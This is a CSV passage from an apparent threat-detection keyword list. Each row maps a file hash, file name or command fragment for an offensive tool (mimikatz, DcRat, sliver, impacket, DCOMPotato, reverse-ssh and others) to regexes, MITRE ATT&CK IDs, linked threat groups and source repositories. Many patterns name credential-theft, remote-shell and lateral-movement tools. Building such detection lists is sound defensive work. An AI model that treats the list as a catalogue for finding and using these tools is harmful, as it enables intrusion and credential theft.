"*dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6*",".{0,1000}dc8e495f3d1ee0060009f69bcdc8b60265879d41d20dd0367a638a101d3a19c6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","40334"
"*dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af*",".{0,1000}dc8ee760f0a1fb1a2f2a239cae71f44382a9be2b67736d590a471eae8c81d0af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40335"
"*dc95d92765b7ff96b8311920bfc939a9f234e961efc7c8fa4effe5d39ec13ea1*",".{0,1000}dc95d92765b7ff96b8311920bfc939a9f234e961efc7c8fa4effe5d39ec13ea1.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40337"
"*dc9978d7-6299-4c5a-a22d-a039cdc716ea*",".{0,1000}dc9978d7\-6299\-4c5a\-a22d\-a039cdc716ea.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#GUIDproject","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","40338"
"*dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112*",".{0,1000}dc9eb5bb3d882cb0ee30fd21ecbbb030e4e0367dff16b06109bfcfc40fef112.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","40339"
"*dca882cdfe33d94f69bd196da5ee79f6120ac057e366cadada88ec42e8f1ce06*",".{0,1000}dca882cdfe33d94f69bd196da5ee79f6120ac057e366cadada88ec42e8f1ce06.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40340"
"*dcbb2973c0775f8c81ec4f4d421de38d62196d169cfcad09ecd41c1ffb74bada*",".{0,1000}dcbb2973c0775f8c81ec4f4d421de38d62196d169cfcad09ecd41c1ffb74bada.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40343"
"*dcbc3efda3331913ba98b1d4feefcb122b5f7e3717b4c57bcdbf10eefa273aae*",".{0,1000}dcbc3efda3331913ba98b1d4feefcb122b5f7e3717b4c57bcdbf10eefa273aae.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40344"
"*dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c*",".{0,1000}dcbc47feceabeaecb5941fd36b3ca000a18ebb5431cb0d415c44e1235140dc2c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","40345"
"*dcbe3cad78afb24101b169bebec5b6d607a567c661fc3e39a659d260789699b4*",".{0,1000}dcbe3cad78afb24101b169bebec5b6d607a567c661fc3e39a659d260789699b4.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","40346"
"*dccbd0950837123fe57b99b394613e19cd4f4a35c26f4bc31b8c952272f213d4*",".{0,1000}dccbd0950837123fe57b99b394613e19cd4f4a35c26f4bc31b8c952272f213d4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40347"
"*DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA*",".{0,1000}DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","40348"
"*dccon.exe -encrypt2*",".{0,1000}dccon\.exe\s\-encrypt2.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40350"
"*dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201*",".{0,1000}dcd82c989816c886bbe27741b2bece34a7bf4a1a9a34abfb9b34fe3cf9484201.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40352"
"*dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36*",".{0,1000}dcd89774d490ecfe91a08d0dcfc37065965f31aab2593987839f5afa19625a36.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40353"
"*dcd8b443ee740b4ccd6674dd1e6b6cfccd9a202c282a67e06ce2f4aaa8a66d95*",".{0,1000}dcd8b443ee740b4ccd6674dd1e6b6cfccd9a202c282a67e06ce2f4aaa8a66d95.{0,1000}","offensive_tool_keyword","revbshell","ReVBShell - Reverse VBS Shell","T1059.005 - T1573.001 - T1105","TA0011 - TA0010","N/A","N/A","C2","https://github.com/bitsadmin/revbshell","1","0","#filehash","N/A","10","10","81","27","2019-10-08T12:00:05Z","2017-02-19T18:58:52Z","40354"
"*dce55c6179bb6f63cbdc3da71c057970fae70cdd66a3fdbe5caedbe8f130e2a2*",".{0,1000}dce55c6179bb6f63cbdc3da71c057970fae70cdd66a3fdbe5caedbe8f130e2a2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40356"
"*dce6f896d4a7b3eeee722bc55b1ea573daa03f81d55714bbfd6c2ebb5a67bf3b*",".{0,1000}dce6f896d4a7b3eeee722bc55b1ea573daa03f81d55714bbfd6c2ebb5a67bf3b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40357"
"*dcef9a8f6aefcf3bbd1facfea19407604e12bec996f162e7bb2d7e0ae0d6e5db*",".{0,1000}dcef9a8f6aefcf3bbd1facfea19407604e12bec996f162e7bb2d7e0ae0d6e5db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40358"
"*dcenum.run*",".{0,1000}dcenum\.run.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40359"
"*dcf01d7641ec3fec213ab8335625a3554b943ac8*",".{0,1000}dcf01d7641ec3fec213ab8335625a3554b943ac8.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","40360"
"*dcf08ed817f5705040d3e83a602e475d8290a10280fbf631a1962aa5e5bb6417*",".{0,1000}dcf08ed817f5705040d3e83a602e475d8290a10280fbf631a1962aa5e5bb6417.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40361"
"*dcf25634e64e3b63715dd4fb669648a819e99b860697aec8fc5da5f5565bad91*",".{0,1000}dcf25634e64e3b63715dd4fb669648a819e99b860697aec8fc5da5f5565bad91.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40362"
"*dcff5e7b030398229d694241415d632ccba115af4846926d16284475d4845236*",".{0,1000}dcff5e7b030398229d694241415d632ccba115af4846926d16284475d4845236.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","40363"
"*--dc-ip *--check-user-access*",".{0,1000}\-\-dc\-ip\s.{0,1000}\-\-check\-user\-access.{0,1000}","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","N/A","5","N/A","N/A","N/A","N/A","40364"
"*dcipher-cli*",".{0,1000}dcipher\-cli.{0,1000}","offensive_tool_keyword","dcipher-cli","Crack hashes using online rainbow & lookup table attack services. right from your terminal.","T1110.001 - T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/k4m4/dcipher-cli","1","0","N/A","N/A","N/A","3","233","27","2023-01-05T16:13:56Z","2018-04-08T18:21:44Z","40365"
"*dcomexec -*",".{0,1000}dcomexec\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","40366"
"*dcomexec.py*",".{0,1000}dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","40367"
"*dcomhijack.cna*",".{0,1000}dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40368"
"*dcomhijack.py -object *",".{0,1000}dcomhijack\.py\s\-object\s.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40369"
"*dcomhijack.py*",".{0,1000}dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40370"
"*dcomhijack-main*",".{0,1000}dcomhijack\-main.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","40371"
"*DCOMPotato.*",".{0,1000}DCOMPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","40372"
"*DCOMPotato-master*",".{0,1000}DCOMPotato\-master.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","40373"
"*DCOMReflection.cpp*",".{0,1000}DCOMReflection\.cpp.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","40374"
"*DCOMUploadExec.exe *",".{0,1000}DCOMUploadExec\.exe\s.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40375"
"*DCOMUploadExec-main.zip*",".{0,1000}DCOMUploadExec\-main\.zip.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40376"
"*DcRat  1.0.7*",".{0,1000}DcRat\s\s1\.0\.7.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40377"
"*DcRat By qwqdanchun*",".{0,1000}DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40378"
"*DCRat Keylogger*",".{0,1000}DCRat\sKeylogger.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40379"
"*DcRat.7z*",".{0,1000}DcRat\.7z.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40380"
"*DcRat.exe*",".{0,1000}DcRat\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40381"
"*DcRat.zip*",".{0,1000}DcRat\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40382"
"*DcRat_png.png*",".{0,1000}DcRat_png\.png.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40383"
"*DCRatBuild*",".{0,1000}DCRatBuild.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40384"
"*DCRat-Log#*",".{0,1000}DCRat\-Log\#.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40385"
"*DcRat-main.zip*",".{0,1000}DcRat\-main\.zip.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40386"
"*DcRatMutex_qwqdanchun*",".{0,1000}DcRatMutex_qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#mutex","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40387"
"*DCRatPlugin*",".{0,1000}DCRatPlugin.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#content","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","40388"
"*dcrypt_bartpe.zip*",".{0,1000}dcrypt_bartpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40389"
"*dcrypt_install.iss*",".{0,1000}dcrypt_install\.iss.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40390"
"*dcrypt_setup_*.exe*",".{0,1000}dcrypt_setup_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40391"
"*dcrypt_winpe.zip*",".{0,1000}dcrypt_winpe\.zip.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40392"
"*dcsync -Domain*",".{0,1000}dcsync\s\-Domain.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","40393"
"*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","40394"
"*dcsync.py*",".{0,1000}dcsync\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","40395"
